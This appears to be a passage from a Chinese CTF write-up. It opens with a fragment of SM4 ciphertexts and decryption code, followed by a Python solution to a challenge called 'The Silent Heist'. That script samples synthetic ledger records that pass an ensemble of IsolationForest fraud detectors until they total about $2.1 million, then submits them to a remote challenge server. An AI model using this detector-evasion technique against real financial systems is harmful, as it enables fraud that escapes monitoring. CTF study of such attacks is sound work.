ce78846ad5c20a6dbb14f7373dfce61976b85e58d3748a157c7801a3d5c42db28cebf75ec1d1089052336e2c805f6e1d401dc35b7bb0bf188e8a9c2e8567a3ae0ec3bf6b9c05a0b6a9673c89693fbe7894b0135481fbddaf394773fad605eae99f4600e956dd8d489eb2ed159c598fabec5b17c8df9c4b414a371aa84b77eefea1bb42418ea7fd3709e2ef4850ddae503e92a0b4ff34aa7020c999bac051005b26fa5a0f828b51e588aeca3e690e9c84ff682164a86379ddda02b1d92f0dee9a1d0cb9cbdf5432cc4b943ba474c4f5467500b0b31d077cf5047aa9384cf4b6757ca370a5e0604fcd15bfedaefe87179f97cf0efe63431c3b3540eb2e459cb8250fc1993bea701c61b61b7ffc13777b2d9f9dc57d229f0489d63280f8e8c73baeb70cada6aa30d3a91d0c8f4f2a26dd4e3e7ad0c99810245ae92a05893d4b74323a37247cc6c9c417f8082ccef101bd31acdc79c8a673396353a030358d2a3db37019672b8042929a68fea5ba9965e5145940355e00debe46e80b75dd31b646f39d4cb3e057bc64c8e3b39a7c6d3bfdd41a836ff87620ec931e8a490f0ad33048de50841a959f4baac6fb0e36b389f6f5ecb3925b04a5d37f37479c0ed02b23f38c64e44300433b5a0cbc4063760642bba08473e11ef2c7be2f6bc0ac99cca4792b17dfe4f3358455566bb4e3006a200a87466f4dafea0bfa7a420220ca5ec4f5e73d89784fce2cfc878df8f3609576975a58ce58d3748a157c7801a3d5c42db28cebf152ab441a154dfbd83e6e929e62be820e41688e06d47bde780960ef807b3fd78bdf05032d4aa84948b384d9afd9fc12c95169f9ee5c386f60e32374951be448e92d4853b4c8ae7fbc715f4562156ba86b5adc49e400e7c227c617a26bbd908a27896015cf6f8532e5c04b5030abe4f7f0f6c167ab0ea204e76fdfca5e6311fee6403bb60415e43af2a10de078a479a8c644709a3082176ffb04af8535796b3acf83bcd500f288a491101dcea576f1dd97ba6ce01d8f1de4e98135bf20f394129672538325aaded45fd604b388019b12df57ff11b010ba7c39dc7f04fd26b770806b46d91016bd16e126c8d3f6c874acfe42ee6bc7030e24c62e9901103458ebd44fced6e5064c2f19da84dfff4c62f6c1088c3bc411ab9ab0f7eb772b85958d94f1775cb597f36010c045326de15287a5ee634e93ce07e0ad0ea5c9cebc60308823d603ef85287de24fb532cbc577b8fd49553f3ca6067dd2b58467a749571247d6c20d005178494c3c9ec028297a8360248ecd4a8d4a9088a0b27faba386dca644709a3082176ffb04af8535796b3ac02f30c6c0d7cc594e2bcafb487e74f12157ce37c1553c6382b1689c659eaeb23672538325aaded45fd604b388019b12df57ff11b010ba7c39dc7f04fd26b770804245b989b54cced122e6e9e9551efd011a479cd8db04b5fdcdb0cb75ba0039c44fced6e5064c2f19da84dfff4c62f6c5f4161bc70501782795e73b2032071d9a205839af1b4b42d35f628f79847bf3cd80c3faa03cab06d8cbeae800ce724a7823d603ef85287de24fb532cbc577b8fa014e820aedef4bbd9685845951995982ccf1a4cef2497d36c1dd18bd968932e5e197f709a77d04aa112373cc4c1d0ab",
"4331cfda21eeab8922fcc7acced16d1a17b02e8d2d9dfee48dc8f18e0dbbb2e4c4547e39d8c4aa2418d9fca52c9c4770",
"7f4b0ef4806983f164af6f46b71d3fce1e3c0bd00c4dd162b72c156f0f3aecd2afcabf551e08380db6fd20316f8a2729",
"de7cc756e5c97fed18a72a95af102dac48dc0810752bd7755157e5909974cbe0ce87241e7f01e3169e7a763a22008029",
"7b82a7a9e2cacaa29b6e70cec2a3302a",
"f958a8cea6721e88d1882e0f16e4da4b"
]
for ciphertext in chiper_list:
plaintext = sm4_decrypt_ECB(key, ciphertext)
print(f"明文: {plaintext}")
print(f"明文(ASCII): {bytes.fromhex(plaintext).decode('utf-8', errors='ignore')}")</p>
<pre><code># AI
## The Silent Heist
```python
给AI做AI(x
import pandas as pd
import numpy as np
from sklearn.ensemble import IsolationForest
from pwn import remote
io = remote("39.106.128.130", 30785)
source = pd.read_csv('public_ledger.csv')
print("-" * 60)
print("Phase I: Data Profiling")
print("-" * 60)
center = source.mean().values
spread = source.cov().values
deviation = source.std().values
print(f"Total entries: {len(source)}")
print(f"Mean of f0 (amount): {center[0]:.2f}")
print(f"Std of f0 (amount): {deviation[0]:.2f}")
print("\n" + "-" * 60)
print("Phase II: Ensemble Anomaly Detectors")
print("-" * 60)
detectors = []
specs = [
{'trees': 100, 'noise': 0.001},
{'trees': 100, 'noise': 0.005},
{'trees': 100, 'noise': 0.01},
{'trees': 200, 'noise': 0.001},
{'trees': 200, 'noise': 0.005},
]
for cfg in specs:
clf = IsolationForest(
n_estimators=cfg['trees'],
contamination=cfg['noise'],
random_state=42,
max_samples='auto'
)
clf.fit(source.values)
detectors.append(clf)
print(f" Built detector: trees={cfg['trees']}, noise={cfg['noise']}")
print("\n" + "-" * 60)
print("Phase III: Synthesizing Plausible Records")
print("-" * 60)
target_sum = 2100000
avg_val = center[0]
needed = int(target_sum / avg_val) + 500
print(f"Target sum: ${target_sum:,}")
print(f"Estimated count: {needed}")
np.random.seed(42)
batch = 20000
approved = []
while len(approved) < needed:
candidates = np.random.multivariate_normal(center, spread, batch)
consensus_ok = np.ones(batch, dtype=bool)
for model in detectors:
labels = model.predict(candidates)
consensus_ok &= (labels == 1)
passed = candidates[consensus_ok]
approved.extend(passed.tolist())
print(f" Generated: {batch} | Accepted: {len(passed)} | Total so far: {len(approved)}")
final_set = np.array(approved[:needed])
field_names = source.columns.tolist()
crafted_df = pd.DataFrame(final_set, columns=field_names)
print("\n" + "-" * 60)
print("Phase IV: Integrity & Consistency Checks")
print("-" * 60)
all_clear = True
for model in detectors:
verdicts = model.predict(crafted_df.values)
clean = np.sum(verdicts == 1)
if clean < len(crafted_df):
all_clear = False
print(f" Detector result: {clean}/{len(crafted_df)} valid")
else:
print(f" Detector result: {clean}/{len(crafted_df)} valid ✓")
final_amount = crafted_df['f0'].sum()
print(f"\nAggregate amount: ${final_amount:,.2f}")
original_hashes = set(tuple(r) for r in source.values)
forged_hashes = set(tuple(r) for r in crafted_df.values)
overlap_count = len(original_hashes & forged_hashes)
print(f"Overlaps with original: {overlap_count}")
distinct_rows = len(crafted_df.drop_duplicates())
print(f"Distinct entries: {distinct_rows}/{len(crafted_df)}")
print("\n" + "-" * 60)
print("Phase V: Output & Submission")
print("-" * 60)
crafted_df.to_csv('fake_transactions.csv', index=False)
print("Synthetic ledger saved as fake_transactions.csv")
submission_blob = crafted_df.to_csv(index=False) + 'EOF'
with open('submit_data.txt', 'w') as f:
f.write(submission_blob)
print("Submission payload written to submit_data.txt")
print("\n" + "-" * 60)
print("Process completed!")
print("-" * 60)
print(f"Records generated: {len(crafted_df)}")
print(f"Total value: ${final_amount:,.2f}")
with open("submit_data.txt", "r") as payload_file:
payload = payload_file.read()
io.recv()
io.send(payload.encode())
io.interactive()
最新评论